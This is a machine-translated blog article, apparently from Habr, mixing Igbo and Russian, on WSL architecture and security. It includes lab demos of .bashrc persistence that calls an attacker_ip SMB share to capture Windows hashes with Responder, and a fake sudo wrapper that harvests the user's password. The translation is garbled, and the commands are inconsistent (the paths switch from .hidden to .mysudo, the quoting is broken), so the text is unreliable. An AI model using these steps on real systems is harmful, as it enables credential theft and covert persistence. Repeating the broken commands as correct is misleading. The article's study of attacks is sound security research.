Ndewo, habr! OTUS na-ewepụta usoro nkuzi ọhụrụ na Ọktọba . N'ịtụ anya mmalite nke usoro ọmụmụ, anyị na-ekerịta otu isiokwu nke otu onye nkụzi anyị, Alexander Kolesnikov dere.
Na 2016, Microsoft webatara teknụzụ WSL ọhụrụ na obodo IT (Wn'ime Subsystem maka Linux), nke n'ọdịniihu mere ka o kwe omume ijikọ ndị asọmpi na-enweghị mgbagha bụ ndị na-alụ ọgụ maka ewu ewu n'etiti ma ndị nkịtị na ndị ọrụ OS dị elu: Windows na Linux. Teknụzụ a mere ka o kwe omume iji ngwaọrụ Linux OS na gburugburu Windows na-enweghị mkpa ịgba ọsọ Linux, dịka ọmụmaatụ, iji Multi-boot. Na Habr ị nwere ike ịhụ ọnụ ọgụgụ buru ibu nke akụkọ na-akọwa uru dị n'iji WSL. Otú ọ dị, ọ dị mwute ikwu, n'oge e kere isiokwu a, ọ dịghị ọmụmụ banyere nchekwa nke ndị dị otú ahụ symbiosis nke sistemụ arụmọrụ hụrụ na akụ a. Nke a post ga-abụ mbọ iji mezie nke a. Isiokwu a ga-ekwu maka atụmatụ nke WSL 1 na 2 architectures ma nyochaa ọtụtụ ihe atụ nke ọgụ na sistemụ na-eji teknụzụ ndị a. E kewara isiokwu ahụ n'ime akụkụ abụọ. Nke mbụ ga-enye usoro mbuso agha isi sitere na Linux na Windows. Isiokwu nke abụọ ga-agụnye ịmepụta ebe ule na imepụtaghachi ọgụ.
WSL 1: atụmatụ ụlọ
Maka ịbanye n'ụzọ ziri ezi n'ime nsogbu nchekwa WSL, ọ dị mkpa iji chọpụta isi nuances jikọtara na mmejuputa nke subsystem. Otu n'ime isi ọrụ onye ọrụ WSL doziri bụ ikike ịrụ ọrụ site na ọdụ Linux na onye ọbịa na-agba Windows OS. Ọzọkwa, ndakọrịta enyere bụ nke obodo nke na Linux executables (ELFs) nwere ike ịgba ọsọ ozugbo na sistemụ Windows. Iji nweta ihe mgbaru ọsọ ndị a, e mepụtara subsystem pụrụ iche na Windows 10 nke na-enye gị ohere iji usoro oku na-eme ngwa Linux mee ihe - ya mere, a nwara ịdepụta nhazi nke Linux syscalls na Windows. Emebere nke a n'anụ ahụ site na ịgbakwunye ndị ọkwọ ụgbọ ala ọhụrụ na usoro usoro ọhụrụ. N'anya, ihe owuwu ụlọ ahụ dị ka nke a:
N'ezie, a haziri mmekọrịta na sistemụ arụmọrụ Linux site na ọtụtụ modul kernel na ụdị usoro pụrụ iche - pico. Site na eserese dị n'elu, ị nwere ike ịhụ na usoro na-agba ọsọ na ihe atụ Linux na onye ọbịa ga-abụrịrị nwa amaala ma ga-eji otu akụrụngwa dị ka ngwa Windows oge niile. Mana ka esi enweta nke a? Na oru ngo E mepụtara echiche usoro maka Windows nke nyere akụkụ niile dị mkpa nke sistemụ arụmọrụ (dabere na ụdị ya) iji mee ngwa nke OS ọzọ.
Rịba ama na abstraction ahụ a tụrụ aro mere ka ọ ghara ilekwasị anya na sistemụ arụmọrụ (karịsịa, Windows), nke a na-atụ anya ka usoro OS ọzọ malite, ma tụọ aro usoro izugbe.
Yabụ, ngwa ọ bụla n'ime usoro pico nwere ike ịgba ọsọ n'agbanyeghị kernel Windows:
- A ghaghị edozi nsogbu nke ndakọrịta na nsụgharị nke oku usoro site na ndị na-enye ndị pụrụ iche;
- A ga-emerịrị njikwa ohere site na Nyocha Nche. Ihe nleba anya dị na kernel ya mere Windows chọrọ nkwalite n'ụdị ọkwọ ụgbọ ala ọhụrụ nke nwere ike ịrụ ọrụ dị ka onye na-eweta usoro ndị dị otú ahụ. E gosipụtara usoro pico prototype n'usoro n'usoro n'okpuru:
Ebe ọ bụ na sistemụ faịlụ Linux na-eji faịlụ nwere mmetụta na aha ndekọ aha, agbakwunyere ụdị sistemụ faịlụ abụọ na Windows iji rụọ ọrụ na WSL - VolFS na DriveFS. VolFS bụ mmejuputa usoro faịlụ Linux, DriveFS bụ sistemụ faịlụ na-arụ ọrụ dịka iwu Windows siri dị, mana nwere ikike ịhọrọ ọgụgụ isi.
WSL 2
WSL 1 nwere ọtụtụ njedebe nke na-ekweghị ka e jiri ya dozie oke ọrụ: dịka ọmụmaatụ, ọ nweghị ike ịme ngwa Linux 32-bit, ma ọ gaghị ekwe omume iji ndị ọkwọ ụgbọala ngwaọrụ. Ya mere, na 2020, a tọhapụrụ WSL 2, nke gbanwere ụzọ iji wuo usoro ihe omume ahụ. WSL 2 bụ igwe mebere nke ọma dabara na njirimara oriri akụrụngwa nke WSL 1. Ugbu a, dabere na nsogbu onye ọrụ Windows OS edozila, ị nwere ike họrọ ụdị sistemụ Linux achọrọ. Iji belata ihe ọghọm ndị nwere ike ime, WSL 2 emejuputa atumatu dabere na Hyper-V in Windows 10. N'ụdị a, Windows nwere ikike ịgba ọsọ kernel sistemụ Linux dị iche. Ọ bara uru icheta na mbipute 1 nke WSL ka ewebatara dị ka njirimara beta nke kwesịrị igosi ntụzịaka mmepe Windows na mpaghara a, yabụ mgbanwe na Hyper-V bụ ihe a na-apụghị izere ezere. Ihe owuwu ikpeazụ dị ka nke a:
Na ụdị a, Windows na Linux kernels nwere ihe onwunwe nke ha na nkwụsịtụ dị naanị na sistemụ faịlụ, mana nkwụsịtụ a ezughi oke. A na-eme mmekọrịta dị n'etiti sistemụ faịlụ site na mkpuchi ihe nkesa ahịa nke na-arụ ọrụ site na iji protocol 9P.
Taa Microsoft na-enye ike ịgbanwe n'etiti WSL 1 na WSL 2. Ụdị abụọ a dị maka ojiji.
WSL nchekwa
N'oge a, enwere ọtụtụ ọrụ na-akọwa ụzọ ụfọdụ esi eji ngwa os ziri ezi wakpo nkwukọrịta n'etiti sistemụ arụmọrụ. Anyị ga-eji edemede ha chọpụta mkpa mwakpo ahụ n'oge edere. Ndepụta izugbe nke mwakpo na ọnọdụ:
1. Mmejuputa usoro faịlụ: ikike ịnweta, nnweta akwụkwọ ndekọ aha / usoro mgbanwe data.
Emere nyocha iji chọpụta mmebi iwu ịnweta site na Linux FS->Windows FS, Windows FS->Linux FS. Nnyocha egosila ikike ịgbanwe faịlụ enyere n'ime OS ebumnuche. Agbalịkwara iji dochie, mepụta oyiri na ihichapụ akụkụ nke sistemụ faịlụ.
Ọnọdụ:
- A. Mwakpo sitere na sistemụ arụmọrụ Windows - mgbanwe nke faịlụ site na ndekọ / wdg nke Linux OS.
- B. Mwakpo sitere na sistemụ arụmọrụ Linux - mgbanwe nke faịlụ na akwụkwọ ndekọ aha:
C:Windows,C:Program Files,C:Users<User>
2. Mmejuputa nke nchịkọta netwọk.
Emere nyocha a site na iji ihe atụ nke mwakpo sitere na sistemụ arụmọrụ Linux na Windows. A na-eji njirimara nke nchịkọta netwọk mee ihe, ya bụ, usoro nyocha na ihe dị iche iche.
Ọnọdụ:
- Imepe ohere n'ọdụ ụgbọ mmiri ejiri na sistemụ Windows
- Imepe ọdụ ụgbọ mmiri na-enweghị ikike kwesịrị ekwesị
- Na-agba ọsọ reverse shei na-eji elf faịlụ na Windows arụ ọrụ.
3. Na-ezobe mmalite nke usoro ngwanrọ ọjọọ site na iji usoro WSL.
Nchọpụta ahụ dabere na eziokwu dị mfe - subsystems nchekwa enweghị ike igbochi ihe omume na kernel ọzọ na-arụ ọrụ site na iji onye na-eweta ihe ziri ezi sitere na sistemụ arụmọrụ n'ihe banyere WSL 1. N'ihe banyere WSL 2, ọ nweghị ụzọ isi lelee ihe omume na-eme. na iche iche kernel n'ime fechaa mebere igwe.
Ọnọdụ:
1) Mwepụta ngwa maka ohere dịpụrụ adịpụ na sistemụ wee lelee mmemme abanyela.
Nnwale WSL 1: interception hash (Windows)
N'ikpeazụ, anyị rutere na akụkụ bara uru. Nke mbụ, ịkwesịrị ịtọlite gburugburu ule. A ga-eme nnwale niile na bench na Windows 10 arụnyere 2004. A họọrọ onyonyo Ubuntu 18.04 dị ka onyonyo sistemụ arụmọrụ maka WSL. Ahọpụtara onyonyo a na enweghị usoro, ma ihe ọ bụla ọzọ ga-arụ otu ihe ahụ. Iwu maka ịtọ ntọala:
Ị ga-ebu ụzọ malite powershell.exe dị ka onye nchịkwa.
Maka WSL 1, ịkwesịrị ịme iwu ndị a:
- Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Включить функцию WSL
- Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804
-OutFile ~/Ubuntu.appx -UseBasicParsing #Загрузить образ Linux из магазина Microsoft
Ubuntu.appx install —root #Установим образ
Возможно, придется прокликать процесс настройки и создать нового пользователя, который будет иметь меньше прав, чем root. Для наших тестов это будет обычный пользователь sam.
Restart-Computer #Перезагрузим
Mgbe ịmaliteghachi nkwụghachi, ị nwere ike ịkpọ iwu bash. Ọ bụrụ na ihe niile na-arụ ọrụ nke ọma, ị ga-ahụ mmepụta yiri nke a na Windows console:
Anyị ga-eji nkesa Kali Linux dị ka igwe onye mwakpo; igwe niile ga-adịrịrị n'otu netwọkụ mpaghara.
Ka anyị were na anyị enweghị ohere ịnweta WSL na igwe Windows. Ka anyị gbalịa ịwakpo sistemụ arụmọrụ Linux site na ịkpọ iwu sitere na Linux. Iji mejuputa ọgụ a, anyị ga-eji usoro autorun dị mfe - anyị ga-agbakwunye edemede anyị maka igbu egbu na gburugburu Linux. Iji mee nke a, ịkwesịrị ịgbanwe faịlụ ahụ .bashrc.
Na igwe nwere WSL anyị na-eme:
1. bash
2. Переходим в домашнюю директорию пользователя: cd /home/sam/
2. echo «/home/sam/.attack.sh» >> .bashrc
3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
4. chmod u+x .attack.sh
5. exitNa igwe Kali Linux anyị na-agba:
1. Responder -I eth0 -rdvwNa igwe Windows, ka anyị malite bash.
Anyị na-eche nsonaazụ na igwe Kali Linux:
Yabụ, anyị nwetara hashes onye ọrụ Windows site na sistemụ WSL site na ime iwu na sistemụ Linux.
Nnwale WSL 1: inweta paswọọdụ onye ọrụ (Linux OS)
Ka anyị mee otu nnwale ọzọ. N'oge nlele a, anyị ga-agbakwunye na faịlụ ahụ .bashrc ọtụtụ iwu iji nweta paswọọdụ onye ọrụ sistemụ arụmọrụ Linux.
Ka anyị malite bash wee tinye iwu ndị a:
1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit
Iji mezue ọgụ ahụ nke ọma, onye ọrụ Sam kwesịrị ịkpọ sudo na ọdụ Linux. Mgbe nke a gasịrị, paswọọdụ onye ọrụ Linux OS ga-adị na faịlụ ahụ pass.txt:
Enyere mmejuputa mwakpo ndị ahụ maka ozi gbasara usoro naanị.
Akụkụ na-esote nke isiokwu ahụ ga-akọwa mmejuputa iwu nke 9P, tụlee ịmepụta nyocha maka usoro a, ma jiri ya mee mwakpo.
Ndepụta akwụkwọ eji
GỤKWUO
isi: www.habr.com